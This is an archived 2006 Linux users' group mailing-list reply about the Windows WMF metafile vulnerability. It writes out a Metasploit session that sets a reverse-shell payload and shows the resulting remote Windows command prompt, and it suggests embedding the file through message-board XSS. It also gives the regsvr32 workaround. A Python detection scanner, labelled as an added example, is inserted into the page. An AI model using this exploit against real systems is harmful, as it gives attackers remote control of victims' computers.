Re: WMF gunshy

From: captgoodnight captgoodnight <captgoodnight@hotmail.com>
Date: Thu Jan 05 2006 - 11:04:48 AKST

Oh the joys of Windows. If ya work with Metasploit, here's the command to
get an example of this particular exploit. The flaw is easy to work into
webpages and cross-site scripting vulns; that, in my opinion, is the
seriousness of this one. XSS and WMF require very little from the victim in
terms of participation... Just imagine this embedded in an avatar XSS on a msg
board, just viewing gets ya compromised... not that far fetched... The
extension can be other than wmf too... ;)

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

Oh, it's sick. The updated Metasploit shows slightly different output than
the above, but it's the same action...

Here's my solution for home comps right now (gfriend's computer, I swear!).

Un-register the Windows Picture and Fax Viewer (Shimgvw.dll)

1. Click Start, click Run, type "regsvr32 -u %windir%\system32\shimgvw.dll"
(without the quotation marks), and then click OK.

2. A dialog box appears to confirm that the un-registration process has
succeeded. Click OK to close the dialog box.

Impact of Workaround: The Windows Picture and Fax Viewer will no longer
be started when users click on a link to an image type that is associated
with the Windows Picture and Fax Viewer.

To undo this change, re-register Shimgvw.dll by following the above steps.
Replace the text in Step 1 with "regsvr32 %windir%\system32\shimgvw.dll"
(without the quotation marks).

I copied the solution off of bugtraq, it works.

In the office, Cisco CSA stopped it in its tracks.

hope it helps,
eddie

>From: bryanm@acsalaska.net
>Reply-To: bryanm@acsalaska.net
>To: AKLUG Mailing List <aklug@aklug.org>
>Subject: Re: WMF gunshy
>Date: Thu, 5 Jan 2006 02:00:34 -0900
>
>On Thu, Jan 05, 2006 at 01:39:25AM -0900, Jim Gribbin <jim@jimgribbin.com>
>wrote:
> > Yes. I have that, but it's still Windows. I don't trust it.
> >
> > Kind of surprised you hadn't heard of it though. Seems like all the talk
> > on the net lately has been about it.
>
>I haven't kept up with slashdot recently. However, if I were
>security-unconscious enough to run Windows, I would certainly
>be security-conscious enough to follow the vulnerability
>announcements. ;)
>
>--
>Bryan Medsker
>bryanm@acsalaska.net
>
>---------
>To unsubscribe, send email to <aklug-request@aklug.org>
>with 'unsubscribe' in the message body.
>

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.
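Added example (not from the post above, and not Metasploit's code): a Python scanner that recognises WMF data by its header rather than by file extension, which is the point behind "the extension can be other than wmf", and flags any Escape record whose sub-function is SETABORTPROC, the record that public analyses of the MS06-001 metafile flaw identified as the trigger; the post itself names only the Metasploit module. The format constants are taken from the WMF file-format specification; the two sample metafiles are constructed inside the block for demonstration and carry no payload.

```python
import struct

# WMF format constants (assumed from the public WMF specification, not from the post).
PLACEABLE_KEY = 0x9AC6CDD7   # magic of the optional 22-byte placeable header
META_EOF = 0x0000
META_ESCAPE = 0x0626
META_SETMAPMODE = 0x0103
SETABORTPROC = 0x0009        # escape sub-function reported as the MS06-001 trigger


def scan_wmf(data):
    """Identify a WMF by structure (not extension) and report its escape records.

    Returns a dict with: is_wmf, placeable, record_count, escapes (list of
    escape sub-function numbers seen), setabortproc, truncated.
    """
    result = {"is_wmf": False, "placeable": False, "record_count": 0,
              "escapes": [], "setabortproc": False, "truncated": False}
    off = 0
    # Optional placeable header precedes the standard 18-byte META_HEADER.
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        result["placeable"] = True
        off = 22
    if len(data) < off + 18:
        return result
    # META_HEADER: Type, HeaderSize (words), Version, Size (words),
    # NumberOfObjects, MaxRecord (words), NumberOfMembers.
    mtype, hdr_words, version, _size, _nobj, _maxrec, _ = struct.unpack_from(
        "<HHHIHIH", data, off)
    if mtype not in (1, 2) or hdr_words != 9 or version not in (0x0100, 0x0300):
        return result
    result["is_wmf"] = True
    off += 18
    # Each record: Size (uint32, in words) then Function (uint16), then params.
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:                      # smaller than the record header itself
            result["truncated"] = True
            break
        end = off + size_words * 2
        if end > len(data):                     # record claims more bytes than exist
            result["truncated"] = True
            end = len(data)
        result["record_count"] += 1
        # META_ESCAPE params: EscapeFunction (uint16), ByteCount (uint16), data.
        if func == META_ESCAPE and off + 10 <= end:
            esc_fn = struct.unpack_from("<H", data, off + 6)[0]
            result["escapes"].append(esc_fn)
            if esc_fn == SETABORTPROC:
                result["setabortproc"] = True
        if func == META_EOF:
            break
        off = end
    return result


def build_wmf(records):
    """Assemble a minimal standard (non-placeable) WMF from (function, params)
    pairs, appending META_EOF. Used here only to construct fixtures."""
    body = b""
    max_words = 0
    for func, params in list(records) + [(META_EOF, b"")]:
        if len(params) % 2:
            params += b"\x00"               # record sizes are in 16-bit words
        words = (6 + len(params)) // 2
        max_words = max(max_words, words)
        body += struct.pack("<IH", words, func) + params
    total_words = (18 + len(body)) // 2
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, total_words, 0, max_words, 0)
    return header + body


# Constructed samples (not files from the post): one harmless metafile that only
# sets the map mode, one carrying an Escape(SETABORTPROC) record with dummy data,
# and the harmless one wrapped in a placeable header.
BENIGN = build_wmf([(META_SETMAPMODE, struct.pack("<H", 8))])
SUSPECT = build_wmf([(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 4) + b"\x00" * 4)])
PLACEABLE_BENIGN = struct.pack("<I", PLACEABLE_KEY) + b"\x00" * 18 + BENIGN


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            r = scan_wmf(fh.read())
        verdict = ("SETABORTPROC escape" if r["setabortproc"]
                   else "wmf" if r["is_wmf"] else "not wmf")
        print(f"{path}: {verdict} records={r['record_count']} "
              f"escapes={r['escapes']} truncated={r['truncated']}")
```

Run it over a directory of downloads or a mail spool regardless of extension; filtering on ".wmf" alone misses exactly the renamed files the post warns about. A record whose size runs past the end of the data is reported separately as truncated rather than silently ignored, since a parser that stops quietly on a malformed size is the easy way to slip an escape record past a scanner.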
Received on Thu Jan 5 11:05:04 2006

This archive was generated by hypermail 2.1.8 : Thu Jan 05 2006 - 11:05:04 AKST